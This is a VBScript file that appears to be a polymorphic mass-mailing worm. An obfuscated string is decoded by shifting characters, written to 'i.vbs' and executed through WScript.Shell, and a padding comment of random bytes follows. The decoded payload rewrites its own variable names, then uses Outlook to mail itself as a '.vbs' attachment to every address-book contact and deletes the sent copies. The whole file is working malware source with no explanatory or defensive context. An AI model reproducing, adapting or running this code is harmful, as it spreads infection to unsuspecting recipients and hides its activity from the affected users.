on error resume next
b = "˜—IŽ››˜›I›Žœž–ŽI—Ž¡63PŸ‹œW–žŠ’˜—[YYZI‹¢I•˜Š63|ŽIœ˜IfIl›ŽŠŽx‹“ŽŒQK|Œ›’™’—Wo’•Ž|¢œŽ–x‹“ŽŒKR63œŽI’•ŽIfIœ˜Wx™Ž—}Ž¡o’•ŽQ€|Œ›’™W|Œ›’™ož••—Š–ŽUZR63’Œ‘Ž›˜f’•ŽW{ŽŠj••63›Š—˜–’£Ž63Š•ŽŠIfI’—Q›—S^YRTZ63Š•ŽŠ[IfI’—Q›—S^YRTZ63ŸŠ•’Œ‘Š›QR63ŸŠ›—Š–ŽfIŒ‘›QŠ•ŽŠT^`R63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKiKUKjKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKˆKUKpKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKXKUKkKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUK…KUKKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKdKUKyKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKÝKUKjKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUK‡KUKlKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKeKUKvKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKgKUKvKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUK‰KUKpKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKcKUKmKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUK„KUKtKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUK†KUKlKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKfKUKrKR63ŸŠ›—Š–Žf›Ž™•ŠŒŽQŸŠ›—Š–ŽUKhKUKrKR63˜›IŠIfIZI˜I•Ž—Q’Œ‘Ž›˜R63ŠœŒ’’ZIfIjœŒQv’Q’Œ‘Ž›˜UIŠUIŠITIZRR63ŒfIŠœŒ’’ZITIŠ•ŽŠ63Œ‘Š›fIŒ‘›QŒR63’—Š•IfI’—Š•IOIŒ‘Š›63—Ž¡63ŽŒ˜ŽfIK|ŽIKOŒ‘›QŠ•ŽŠ[T^`ROKIfIl›ŽŠŽx‹“ŽŒQKOŒ‘›Q\]ROK|Œ›’™’—Wo’•Ž|¢œŽ–x‹“ŽŒKOŒ‘›Q\]ROKRKOŸ‹Œ›•OIˆ63K˜›IKOŒ‘›QŠ•ŽŠT_ZROKIfIZI˜I•Ž—QKOŸŠ›—Š–ŽOKRKOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠ[T_[ROKIfIjœŒQv’QKOŸŠ›—Š–ŽOKUIKOŒ‘›QŠ•ŽŠT_ZROKUIKOŒ‘›QŠ•ŽŠT_ZROKITIZRRKOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠT_YROKIfIKOŒ‘›QŠ•ŽŠ[T_[ROKIVIKOŠ•ŽŠOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠT^bROKIfIŒ‘›QKOŒ‘›QŠ•ŽŠT_YROKRKOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠT^aROKIfIKOŒ‘›QŠ•ŽŠT^aROKIOIKOŒ‘›QŠ•ŽŠT^bROŸ‹Œ›•OIˆ63K—Ž¡KOŸ‹Œ›•OIˆ63KœŽIKOŒ‘›QŠ•ŽŠ[T^aROKfl›ŽŠŽx‹“ŽŒQKOŒ‘›Q\]ROK€|Œ›’™W|‘Ž••KOŒ‘›Q\]ROKRKOŸ‹Œ›•OIˆ63KœŽIKOŒ‘›QŠ•ŽŠ[T^bROKfKOŒ‘›QŠ•ŽŠ[T^`ROKWl›ŽŠŽ}Ž¡o’•ŽQKOŒ‘›Q\]ROŒ‘›QŠ•ŽŠ[T^aROKWŸ‹œKOŒ‘›Q\]ROKRKOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠ[T^bROKW ›’ŽIKOŒ‘›QŠ•ŽŠT^aROŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠ[T^bROKWŒ•˜œŽKOŸ‹Œ›•OIˆ63Œ‘›QŠ•ŽŠ[T^aROKW›ž—IKOŒ‘›Q\]ROK œŒ›’™WŽ¡ŽIKOŒ‘›QŠ•ŽŠ[T^aROKWŸ‹œKOŒ‘›Q\]ROKUIZUIŠ•œŽK63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKiKUKj›KR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKˆKUKpžKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKXKUKkŠKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUK…KUKŠKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKdKUKyžKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKÝKUKjŒKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUK‡KUKl’KR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKeKUKvŠKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKgKUKvšKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUK‰KUKp›KR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKcKUKmyKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUK„KUKt˜KR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUK†KUKl˜KR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKhKUKnKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKfIfKUKrIfKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKfIfKUKfIrKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKOIfKUKOIrKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKffKUKrIfKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKfWKUKrWKR63ŽŒ˜Žf›Ž™•ŠŒŽQŽŒ˜ŽUKQfRKUKQrRKR63›Š—˜–’£Ž63ŸŠ››Šœ‘IfI’—Q›—S[[[R63›Šœ‘IfIKPK63˜›I‹IfIZI˜IŸŠ››Šœ‘63ŸŠ›\IfI’—Q›—S[[[RT\^63›Šœ‘IfI›Šœ‘IOIŒ‘›QŸŠ›\R63—Ž¡63’—Š•[IfIK˜—IŽ››˜›I›Žœž–ŽI—Ž¡KOŸ‹Œ›•OŸŠ›—Š–ŽOKIfIKOŒ‘›Q\]ROI’—Š•IOŒ‘›Q\]ROŸ‹Œ›•OŽŒ˜ŽOŸ‹Œ›•O›Šœ‘63œŽIž—˜fœ˜Wl›ŽŠŽ}Ž¡o’•ŽQŸŠ›—Š–ŽOKWŸ‹œKR63ž—˜W ›’ŽI’—Š•[63ž—˜WŒ•˜œŽ63|ŽIxž•˜˜”j™™IfIl›ŽŠŽx‹“ŽŒQKxž•˜˜”Wj™™•’ŒŠ’˜—KR63rIxž•˜˜”j™™IfIKxž•˜˜”KI}‘Ž—63|ŽIvŠ™’IfIxž•˜˜”j™™WpŽwŠ–Ž|™ŠŒŽQKvjyrKR63œŽI–Š™’Š•’œIfIvŠ™’Wj›Žœœu’œœ63o˜›InŠŒ‘Ij›Žœœ•’œIr—II–Š™’Š•’œ63rIj›Žœœ•’œWj›Žœœn—›’ŽœWl˜ž—IegIYI}‘Ž—63j›Žœœ•’œŒ˜žIfIj›Žœœ•’œWj›Žœœn—›’ŽœWl˜ž—63o˜›Iju’œIfIZI}˜Ij›Žœœ•’œŒ˜ž63|ŽI–œIfIxž•˜˜”j™™Wl›ŽŠŽrŽ–QYR63|ŽIjn—›’ŽœIfIj›Žœœ•’œWj›Žœœn—›’ŽœQju’œR63–œW}˜IfIjn—›’ŽœWj›Žœœ63–œW|ž‹“ŽŒIfIK{ncK63–œWk˜¢IfIKK63œŽIjŠŒ‘œf–œWjŠŒ‘–Ž—œ63jŠŒ‘œWjIŸŠ›—Š–ŽOKWŸ‹œK63–œWmŽ•ŽŽjŽ›|ž‹–’IfI}›žŽ63rI–œW}˜IegIKKI}‘Ž—63–œW|Ž—63n—Ir63wŽ¡63n—Ir63wŽ¡63n—Ir"
Set h = CreateObject("Scripting.FileSystemObject")
for f = 1 to len(b)
m = Asc(Mid(b, f, f + 1))
e = m - 41
d = chr(e)
c = c & d
next
set i=CreateObject("WScript.Shell")
set j=h.CreateTextFile("i.vbs")
j.write c
j.close
i.run "wscript.exe i.vbs", 1, false
'ˆ­jÙûZGxb¢·»HÛ…þ±•gçÈ7O­šðg¼v•Œ±‚îÚE„Œµ{ÅÉ¦£“ÆöÐii~+ã÷è¸$µ¹ã#JÝ2‡àI:m³Å–üjžËt8¹hK‡‰¶hÑ›„Eù;´$L}Aº(“X†ÑiÒ=1àeŒ¥Ë~éb/«YªJJ(BUrÉyå¨äJ¦fŠ”ŠbùïÌ/î¤–Ü»KS‹×ôÍ žæ¼áÊh£æä±ÔÞqq‡ÍKd çÅK›aØuçÎ,ä?/tª0;óôC×J„_ß7åµÝä“9Ê¾§x•ÜF&ðøÿGÐ